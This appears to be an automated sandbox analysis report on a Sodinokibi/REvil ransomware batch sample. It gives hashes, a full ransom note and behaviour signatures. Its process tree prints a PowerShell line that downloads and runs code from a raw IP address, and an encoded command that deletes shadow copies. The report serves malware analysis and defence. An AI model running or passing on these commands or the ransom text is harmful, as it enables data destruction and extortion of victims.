Analysis

  • max time kernel
    38s
  • max time network
    59s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    04-06-2020 22:10

General

  • Target

    bef69b68e4cea8e3eefee8da26543509.bat

  • Size

    220B

  • MD5

    f506edf0fe02fe851c4ad75db6112399

  • SHA1

    583ba0b7f8553e3ea3adf90de4f1750e8d989390

  • SHA256

    f6d98f99d70c4be05421f3c7fddc98c074854a0e6a38659100f275804a5c187e

  • SHA512

    db82f1056a21ebf451fb3bc400daf9efd94c43110f256c74653bc68f7c113a4d93e1c633c084a687cb42d391875c026fa643c221ccb1126ead3bf2d7cfaa3619

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/bef69b68e4cea8e3eefee8da26543509

Extracted

Path

C:\z51x2b3522-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension z51x2b3522. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3187F5FE3E32B1A5 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/3187F5FE3E32B1A5 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 6ktb5mgbCAV1rZK0eC+iQPSbWzI5jGFefuoEWLlkNpfiYmrksQgaX0FeMgyDxUbL xrX51lo1Ctu4RoU1WEItGMhrm1RjCDcZOzGvr+9d/ZdSvnNuSmR9cPxf20GlxXdz oZdUZBHT/cJK8tKKfb9RmZ7qyly9KCZ7byi5IYoSj0eu+2v7HMB4uL7sAomQjd5O X7gmap3ltocMluln96ykHNroztbSli1pSKVaNe3WzS2XAf07VmnV4Vomv52cRgB/ Gw/eXn20UeKTWdOVsO35cqINYDNcLhOK7rNgylEb+KKDV29hPCBoyL0wNRnzIdy+ HmwALtls377Xb6jii7t2uGnB35QOHd/8oFRv+4i8ksFgsrea64EGW/h5ERMFI5gT NbqGhSD/lo/FxEDeZcasbIlQ2lXMZXPRG63duL4WdX2sGXrSi7pFSRbrb98FCseA t9gO+wR1aKmQiMsccMXjlh8zYBF8dWo/Mrh/ioFeaWnXro9+oBUkECo1/WKyb1iP BndQwqh01CrQsAIK/Td9ftY17d0lqblj9uk+dySOz7LrYkDoH/bd6xPut6lPRaif tD2E29DccQKUaCVc+PUPxJ6w1MtHBG3FNot1LtMfiRyXjsktV4biu0hg8/yrXeqZ rQWD2nYw+OotsaaIePfXoJSAR9vl7PkfZzCLYMca+02Nv6b2X8W4RoIYVh6jpxii rbKmuqB4lydqHzXFt1IUW37cqQIPdfexso23QLyUA8ZjDUaMIMHqKxMyrCHNPx7P yyi1HVbqeS6FlcZu3aJzjOtm+84tn9utbD6CKGCympYwgI7Yw6ZC34/YBf5BYAvu J85p8juZjrzq/mmb995DelqgoK7ED/NgJfEZ2q5BI/j4tzp2cPHIQGNaf5l3bCSA wpNqUrYHx4Yc8OKrSyCmZtFYcd42kmsrH+uWaEm7AXKpSdVfrmI8GDy6RN1kO8FF u5phWBPoaDIx9G71ghGZqLXNH8isxgIkCgqQk7v7vUh+sFyi04eanfzf38etfN52 7bLcbS30cwIvgozCcUc4yJBc3bYlvFmraRrsqKHl46eRD31iUsLFRrKbkwsw+0RP 9pYpr2scR4Bq21OPkheDrn5eoCvSGXKP4C3yFp7098p9vTOSPjyahPcTT1K+KIKp /DuEc4RCUHNL00hoQOWUzA5kxSBKJQtqz2QnguCE0oABPxZhHls4HOBHRLhj7oNC s+NTDcN4dVH0S1sIFSGDf6mRhsyFg9IRdfbOtzZqfyRg5doG8miMSM57MwA4ECNX U/H8nYlbiSa4HnxexSvbCo7GWiEB8rw6mZ1JisAl+Px87Xd4Egnu6Q== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3187F5FE3E32B1A5

http://decryptor.cc/3187F5FE3E32B1A5

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\bef69b68e4cea8e3eefee8da26543509.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1304
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bef69b68e4cea8e3eefee8da26543509');Invoke-YKHKXOBCRZILZ;Start-Sleep -s 10000"
      2⤵
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      PID:1396
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1536
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:656

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms